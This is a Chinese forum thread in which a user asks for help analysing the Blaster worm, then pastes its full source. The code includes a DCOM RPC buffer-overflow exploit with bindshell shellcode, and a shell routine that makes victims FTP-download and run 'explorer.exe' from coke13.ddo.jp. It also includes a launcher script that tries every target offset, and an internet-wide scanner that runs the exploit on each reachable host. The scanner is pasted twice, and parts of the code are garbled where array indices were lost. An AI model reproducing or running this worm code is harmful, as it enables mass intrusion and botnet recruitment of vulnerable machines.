标题:
求助!哪位高手分析过冲击波的源代码.
[打印本页]
作者:
xixiha
时间:
2005-3-30 07:56
标题:
求助!哪位高手分析过冲击波的源代码.
哪位高人帮忙分析一下冲击波的源代码啊,俺遇到些问题,急需对冲击波的源码的分析,谢谢了.
作者:
千與千尋
时间:
2005-3-30 16:34
标题:
求助!哪位高手分析过冲击波的源代码.
病毒源代码还是补定源代码`~ 你是做安全的还是?////
作者:
xixiha
时间:
2005-4-1 10:02
标题:
求助!哪位高手分析过冲击波的源代码.
研究病毒啊.是源程序. 源程序 VDCOM.c /* RPC DCOM WORM v 2.2 - * originally by volkam, fixed and beefed by uv/graff * even more original concept by LSD-pl.net * original code by HDM * * -- * This code is in relation to a specific DDOS IRCD botnet project. * You may edit the code, and define which ftp to login * and which .exeutable file to recieve and run. * I use spybot, very convienent * - * So basicly script kids and brazilian children, this is useless to you * * - * shouts: darksyn - true homie , giver of 0d4yz, and testbeds * volkam - top sekret agent man * ntfx - master pupil * jpahk - true homie #2 * * Legion2000 Security Research (c) 2003 * - * enjoy! **************************************************************/ #include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char *targets [] = { "Windows NT SP4 (english)", "Windows NT SP5 (chineese)", "Windows NT SP6 (chineese)", "Windows NT SP6a (chineese)", "Windows 2000 NOSP (polish)", "Windows 2000 SP3 (polish)", "Windows 2000 SP4 (spanish)", "Windows 2000 NOSP1 (english)", "Windows 2000 NOSP2 (english)", "Windows 2000 SP2-1 (english)", "Windows 2000 SP2-2 (english)", "Windows 2000 SP3-2 (english)", "Windows 2000 NOSP (chineese)", "Windows 2000 SP1 (chineese)", "Windows 2000 SP2 (chineese)", "Windows 2000 SP3 (chineese)", "Windows 2000 SP4 (chineese)", "Windows 2000 SP3 (german)", "Windows 2000 NOSP (japaneese", "Windows 2000 SP1 (japaneese)", "Windows 2000 SP2 (japaneese)", "Windows 2000 NOSP (korean)", "Windows 2000 SP1 (korean)", "Windows 2000 SP2 (korean)", "Windows 2000 NOSP (mexican)", "Windows 2000 SP1 (mexican)", "Windows XP NOSP (english)", "Windows SP1-2 (english)", "Windows 2k3 (english)", "Windows 2000 SP3 (german)", "Windows 2000 SP4-1 (german)", "Windows 2000 SP4-2 (german)", "Windows XP SP1 (german)", "Windows 2000 SERVER SP1 (french)", "Windows 2000 SERVER SP4 (french)", "Windows XP NOSP (french)", "Windows XP SP1 (french)", "Windows 2000 SP0 (english)", "Windows 2000 SP1 (english)", "Windows 2000 SP2 (english)", "Windows 2000 SP3 (english)", "Windows 2000 SP4 (english)", "Windows XP SP0 (english)", "Windows XP SP1-1 (english)", "Windows XP SP2 (english)", "Windows 2000 Advanced Server SP3 (english)", "ALL/WINXP/WIN2K", NULL }; unsigned long offsets [] = { 0x77e527f3, 0x77cfdaee, 0x77ac0ef0, 0x77c3eaf0, 0x774d3fe3, 0x77292ce4, 0x77133ba5, 0x777416e8, 0x772b49e2, 0x77b524e8, 0x775cfa2e, 0x772ae3e2, 0x778b89e6, 0x772b49e0, 0x77444342, 0x77294cdf, 0x777a882e, 0x77e527f3, 0x778b89e5, 0x772b49df, 0x772ae3e1, 0x778b89e5, 0x772b49df, 0x772ae3e1, 0x778b89e8, 0x77e3afe9, 0x77db37d7, 0x77b05422, 0x77292ce3, 0x77294ce0, 0x7756c2e2, 0x77fc18d4, 0x774b3ee4, 0x7756c2e2, 0x774a75d4, 0x77fc18d4, 0x77e81674, 0x77e829ec, 0x77e824b5, 0x77e8367a, 0x77f92a9b, 0x77e9afe3, 0x77e626ba, 0x77d737db, 0x77e2afc5, 0x010016C6 }; unsigned char sc[]= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\xff\xff\xff\xff" /* return address */ "\xcc\xe0\xfd\x7f" /* primary thread data block */ "\xcc\xe0\xfd\x7f" /* primary thread data block */ /* port 4444 bindshell */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="echo open coke13.ddo.jp>>o&echo wed>>o&echo wed>>o&echo user wed wed>>o&echo bin>>o&echo get explorer.exe>>o&echo bye>>o&ftp -s:o&explorer.exe&del o&exit\n"; int n; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); FD_SET(0, &fd_read); send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break; if (FD_ISSET(sock, &fd_read)) { if((n = recv(sock, buff, sizeof(buff), 0)) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (write(1, buff, n) < 0) break; } if (FD_ISSET(0, &fd_read)) { if((n = read(0, buff, sizeof(buff))) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (send(sock, buff, n, 0) < 0) break; } usleep(10); exit(0); } fprintf(stderr, "Connection lost.\n\n"); exit(0); } int main(int argc, char **argv) { int sock; int len,len1; unsigned int target_id; unsigned long ret; struct sockaddr_in target_ip; unsigned short port = 135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; printf("---------------------------------------------------------\n"); printf("- Remote DCOM RPC Buffer Overflow Exploit\n"); printf("- Original code by FlashSky and Benjurry\n"); printf("- Rewritten by HDM\n"); printf("- autoroot/worm by volkam\n"); printf("- Fixed and Beefed by Legion2000 Security Research\n"); if(argc<3) { printf("- Usage: %s
\n", argv[0]); printf("- Targets:\n"); for (len=0; targets[len] != NULL; len++) { printf("- %d\t%s\n", len, targets[len]); } printf("\n"); exit(1); } /* yeah, get over it */ target_id = atoi(argv[1]); ret = offsets[target_id]; printf("- Using return address of 0x%.8x\n", ret); memcpy(sc+36, (unsigned char *) &ret, 4); target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(argv[2]); target_ip.sin_port = htons(port); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("- Socket"); return(0); } if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) { perror("- Connect"); return(0); } len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; if (send(sock,bindstr,sizeof(bindstr),0)== -1) { perror("- Send"); return(0); } len=recv(sock, buf1, 1000, 0); if (send(sock,buf2,len1,0)== -1) { perror("- Send"); return(0); } close(sock); sleep(1); target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(argv[2]); target_ip.sin_port = htons(4444); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("- Socket"); return(0); } if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) { printf("- Exploit appeared to have failed.\n"); return(0); } printf("- Dropping to System Shell...\n\n"); shell(sock); return(0); } serv ./vdcom 44 $1& ./vdcom 45 $1& ./vdcom 46 $1& ./vdcom 10 $1& ./vdcom 11 $1& ./vdcom 12 $1& ./vdcom 13 $1& ./vdcom 14 $1& ./vdcom 15 $1& ./vdcom 16 $1& ./vdcom 17 $1& ./vdcom 18 $1& ./vdcom 19 $1& ./vdcom 20 $1& ./vdcom 21 $1& ./vdcom 22 $1& ./vdcom 23 $1& ./vdcom 24 $1& ./vdcom 25 $1& ./vdcom 26 $1& ./vdcom 27 $1& ./vdcom 28 $1& ./vdcom 29 $1& ./vdcom 30 $1& ./vdcom 31 $1& ./vdcom 32 $1& ./vdcom 33 $1& ./vdcom 34 $1& ./vdcom 35 $1& ./vdcom 36 $1& ./vdcom 37 $1& ./vdcom 38 $1& ./vdcom 39 $1& ./vdcom 40 $1& ./vdcom 41 $1& ./vdcom 42 $1& ./vdcom 43 $1& ./vdcom 5 $1& ./vdcom 4 $1& ./vdcom 6 $1& ./vdcom 0 $1& ./vdcom 1 $1& ./vdcom 2 $1& ./vdcom 3 $1& ./vdcom 8 $1& ./vdcom 9 $1& ./vdcom 7 $1& SCAN.c #include
#include
#include
#include
#include
#include
#include
#include
#define MAX_SOCKETS 1000 #define TIMEOUT 2 #define S_NONE 0 #define S_CONNECTING 1 struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); int main(int argc, char *argv[]) { int done, i, aa, bb, cc, dd, ret, k, ns; unsigned int port; time_t scantime; char ip[20]; if (argc < 3) { printf("Usage: %s
[b-block] [c-block]\n", argv[0]); return -1; } done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0; aa = atoi(argv[1]); if ((aa < 0) || (aa > 255)) { fatal("Invalid a-range\n"); } port = (unsigned int)atoi(argv[2]); if (port == 0) fatal("Bad port number.\n"); if (argc >= 4) { bb = atoi(argv[3]); if ((bb < 0) || (bb > 255)) fatal("Invalid b-range.\n"); } if (argc >= 5) { cc = atoi(argv[4]); if ((cc < 0) || (cc > 255)) fatal("Invalid c-range.\n"); } init_sockets(); scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (dd == 255) { if (cc < 255) { cc++; dd = 0; } else { if (bb < 255) { bb++; cc = 0; dd = 0; } else { if (aa < 255) { aa++; bb = 0; cc = 0; dd = 0; } else { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) ns++; } if (ns == 0) break; } } } } if (connlist
.status == S_NONE) { connlist
.s = socket(AF_INET, SOCK_STREAM, 0); if (connlist
.s != -1) { ret = fcntl(connlist
.s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist
.s); } else { memset((char *)ip, 0, 20); sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd); connlist
.addr.sin_addr.s_addr = inet_addr(ip); if (connlist
.addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist
.addr.sin_family = AF_INET; connlist
.addr.sin_port = htons(port); connlist
.a = time(0); connlist
.status = S_CONNECTING; dd++; } } } } check_sockets(); } } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist
.status = S_NONE; memset((struct sockaddr_in *)&connlist
.addr, 0, sizeof(struct sockaddr_in)); } } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist
.a < (time(0) - TIMEOUT)) && (connlist
.status == S_CONNECTING)) { close(connlist
.s); connlist
.status = S_NONE; } else if (connlist
.status == S_CONNECTING) { ret = connect(connlist
.s, (struct sockaddr *)&connlist
.addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { printf("%s\n", (char *)inet_ntoa(connlist
.addr.sin_addr), (time(0)-connlist
.a)); close(connlist
.s); connlist
.status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist
.s); connlist
.status = S_NONE; } } else { char luck[100]; sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist
.addr.sin_addr),(time(0)-connlist
.a)); printf("Attempting RPC/DCOM on %s\n", (char *)inet_ntoa(connlist
.addr.sin_addr), (time(0)-connlist
.a)); system(luck); printf("Done with %s Next ...\n"); close(connlist
.s); connlist
.status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) { if (connlist
.status >= S_CONNECTING) close(connlist
.s); } exit(-1); } SCAN.c #include
#include
#include
#include
#include
#include
#include
#include
#define MAX_SOCKETS 1000 #define TIMEOUT 2 #define S_NONE 0 #define S_CONNECTING 1 struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); int main(int argc, char *argv[]) { int done, i, aa, bb, cc, dd, ret, k, ns; unsigned int port; time_t scantime; char ip[20]; if (argc < 3) { printf("Usage: %s
[b-block] [c-block]\n", argv[0]); return -1; } done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0; aa = atoi(argv[1]); if ((aa < 0) || (aa > 255)) { fatal("Invalid a-range\n"); } port = (unsigned int)atoi(argv[2]); if (port == 0) fatal("Bad port number.\n"); if (argc >= 4) { bb = atoi(argv[3]); if ((bb < 0) || (bb > 255)) fatal("Invalid b-range.\n"); } if (argc >= 5) { cc = atoi(argv[4]); if ((cc < 0) || (cc > 255)) fatal("Invalid c-range.\n"); } init_sockets(); scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (dd == 255) { if (cc < 255) { cc++; dd = 0; } else { if (bb < 255) { bb++; cc = 0; dd = 0; } else { if (aa < 255) { aa++; bb = 0; cc = 0; dd = 0; } else { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) ns++; } if (ns == 0) break; } } } } if (connlist
.status == S_NONE) { connlist
.s = socket(AF_INET, SOCK_STREAM, 0); if (connlist
.s != -1) { ret = fcntl(connlist
.s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist
.s); } else { memset((char *)ip, 0, 20); sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd); connlist
.addr.sin_addr.s_addr = inet_addr(ip); if (connlist
.addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist
.addr.sin_family = AF_INET; connlist
.addr.sin_port = htons(port); connlist
.a = time(0); connlist
.status = S_CONNECTING; dd++; } } } } check_sockets(); } } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist
.status = S_NONE; memset((struct sockaddr_in *)&connlist
.addr, 0, sizeof(struct sockaddr_in)); } } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist
.a < (time(0) - TIMEOUT)) && (connlist
.status == S_CONNECTING)) { close(connlist
.s); connlist
.status = S_NONE; } else if (connlist
.status == S_CONNECTING) { ret = connect(connlist
.s, (struct sockaddr *)&connlist
.addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { printf("%s\n", (char *)inet_ntoa(connlist
.addr.sin_addr), (time(0)-connlist
.a)); close(connlist
.s); connlist
.status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist
.s); connlist
.status = S_NONE; } } else { char luck[100]; sprintf(luck,"./serv %s",(char *)inet_ntoa(connlist
.addr.sin_addr),(time(0)-connlist
.a)); printf("Attempting RPC/DCOM on %s\n", (char *)inet_ntoa(connlist
.addr.sin_addr), (time(0)-connlist
.a)); system(luck); printf("Done with %s Next ...\n"); close(connlist
.s); connlist
.status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) { if (connlist
